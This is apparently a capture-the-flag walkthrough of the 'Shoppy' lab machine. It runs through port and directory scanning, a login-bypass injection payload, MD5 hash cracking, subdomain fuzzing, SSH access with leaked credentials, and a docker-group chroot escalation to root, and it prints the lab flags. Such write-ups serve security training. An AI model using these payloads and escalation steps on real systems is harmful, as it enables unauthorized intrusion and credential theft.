Shoppy
Port recognition withnmap
or you can use recon
┌──(root@ghost)-[/home/ghost]
└─# recon shoppy.htb
.o oOOOOOOOo OOOo
Ob.OOOOOOOo OOOo. oOOo. .adOOOOOOO
OboO"""""""""""".OOo. .oOOOOOo. OOOo.oOOOOOo.."""""""""'OO
OOP.oOOOOOOOOOOO "POOOOOOOOOOOo. `"OOOOOOOOOP,OOOOOOOOOOOB'
`O'OOOO' `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO' `OOOOo
.OOOO' `OOOOOOOOOOOOOOOOOOOOOOOOOO' `OO
OOOOO '"OOOOOOOOOOOOOOOO"` oOO
oOOOOOba. .adOOOOOOOOOOba .adOOOOo.
oOOOOOOOOOOOOOba. .adOOOOOOOOOO@^OOOOOOOba. .adOOOOOOOOOOOO
OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"` '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
"OOOO" "YOoOOOOMOIONODOO"` . '"OOROAOPOEOOOoOY" "OOO"
Y 'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?' :`
: .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO? .
. oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
'%o OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
`$" `OOOO' `O"Y ' `OOOO' o .
. . OP" : o .
:
.
[R3C0N] by 0bfxgh0st 4 WWA with ❤
[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-18 07:22 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 07:22
Completed NSE at 07:22, 0.00s elapsed
Initiating Ping Scan at 07:22
Scanning shoppy.htb (10.10.11.180) [4 ports]
Completed Ping Scan at 07:22, 0.39s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 07:22
Scanning shoppy.htb (10.10.11.180) [65535 ports]
Discovered open port 80/tcp on 10.10.11.180
Discovered open port 22/tcp on 10.10.11.180
Discovered open port 9093/tcp on 10.10.11.180
Completed SYN Stealth Scan at 07:22, 22.48s elapsed (65535 total ports)
NSE: Script scanning 10.10.11.180.
Initiating NSE at 07:22
Completed NSE at 07:22, 0.00s elapsed
Nmap scan report for shoppy.htb (10.10.11.180)
Host is up (0.13s latency).
Not shown: 63243 closed tcp ports (reset), 2289 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
9093/tcp open copycat
NSE: Script Post-scanning.
Initiating NSE at 07:22
Completed NSE at 07:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 23.18 seconds
Raw packets sent: 110486 (4.861MB) | Rcvd: 75267 (3.028MB)
[i] [Server info]
http://shoppy.htb:80 [200 OK] Country[RESERVED][ZZ], HTML5, HTTPServer[nginx/1.23.1], IP[10.10.11.180], JQuery, Script, Title[Shoppy Wait Page][Title element contains newline(s)!], nginx[1.23.1]
[+] [fuzzin server]
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Oct 18 07:22:40 2022
URL_BASE: http://shoppy.htb:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://shoppy.htb:80/ ----
+ http://shoppy.htb:80/admin (CODE:302|SIZE:28)
+ http://shoppy.htb:80/Admin (CODE:302|SIZE:28)
+ http://shoppy.htb:80/ADMIN (CODE:302|SIZE:28)
+ http://shoppy.htb:80/assets (CODE:301|SIZE:179)
+ http://shoppy.htb:80/css (CODE:301|SIZE:173)
+ http://shoppy.htb:80/exports (CODE:301|SIZE:181)
+ http://shoppy.htb:80/favicon.ico (CODE:200|SIZE:213054)
+ http://shoppy.htb:80/fonts (CODE:301|SIZE:177)
+ http://shoppy.htb:80/images (CODE:301|SIZE:179)
+ http://shoppy.htb:80/js (CODE:301|SIZE:171)
+ http://shoppy.htb:80/login (CODE:200|SIZE:1074)
+ http://shoppy.htb:80/Login (CODE:200|SIZE:1074)
-----------------
END_TIME: Tue Oct 18 07:34:55 2022
DOWNLOADED: 4612 - FOUND: 12
recon reports three open ports and a few server information

We found a login website which is vulnerable to multiple sql injection this was what we used admin' || '1=1


Search for users and same injection admin' || '1=1

Click on Download export

We obtained admin and josh hashed credentials
┌──(root@ghost)-[/home/ghost]
└─# cat hashes
23c6877d9e2b564ef8b32c3a23de27b2
6ebcea65320589ca4f2f1ce039975995
┌──(root@ghost)-[/home/ghost]
└─# john --format=RAW-MD5 --wordlist=rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (Raw-MD5 [MD5 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
remembermethisway (?)
1g 0:00:00:00 DONE (2022-10-18 08:00) 1.724g/s 24729Kp/s 24729Kc/s 26130KC/s fuckyooh21..*7¡Vamos!
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.
After trying josh credentials on ssh fails so maybe we should look for subdomains, we need other site to login
┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c -w /usr/share/seclists/Discovery/DNS/namelist.txt --hc 400,404,403,301 -H "Host: FUZZ.shoppy.htb" http://shoppy.htb
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://shoppy.htb/
Total requests: 151265
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000082865: 200 0 L 141 W 3122 Ch "mattermost"
Total time: 0
Processed Requests: 151265
Filtered Requests: 151264
Requests/sec.: 0
We found mattermost subdomain, add it to /etc/hosts
┌──(root@ghost)-[/home/ghost]
└─# cat /etc/hosts
10.10.11.180 shoppy.htb mattermost.shoppy.htb


Credentials found jaeger:Sh0ppyBest@pp!
┌──(root@ghost)-[/home/ghost]
└─# ssh jaeger@shoppy.htb
The authenticity of host 'shoppy.htb (10.10.11.180)' can't be established.
ED25519 key fingerprint is SHA256:RISsnnLs1eloK7XlOTr2TwStHh2R8hui07wd1iFyB+8.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'shoppy.htb' (ED25519) to the list of known hosts.
jaeger@shoppy.htb's password:
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
jaeger@shoppy:~$ cat user.txt
b6704531a2935f3e0a1c7f08bdc4f757
We are in the system as user jaeger, let's try turn to root
jaeger@shoppy:~$ sudo -l
[sudo] password for jaeger:
Matching Defaults entries for jaeger on shoppy:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jaeger may run the following commands on shoppy:
(deploy) /home/deploy/password-manager
As we can see we can run /home/deploy/password-manager as deploy user
jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sh0ppyBest@pp!
Access denied! This incident will be reported !

Using cat command leaks Sample string who didn't show up with strings command
jaeger@shoppy:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: Deploying@pp!
We have deploy credentials
jaeger@shoppy:~$ su deploy
Password:
$ whoami
deploy
$ groups
deploy docker
We found user deploy and docker in groups
$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# whoami
root
# cat /root/root.txt
91fb00fafd53647e47f7726ffb797cba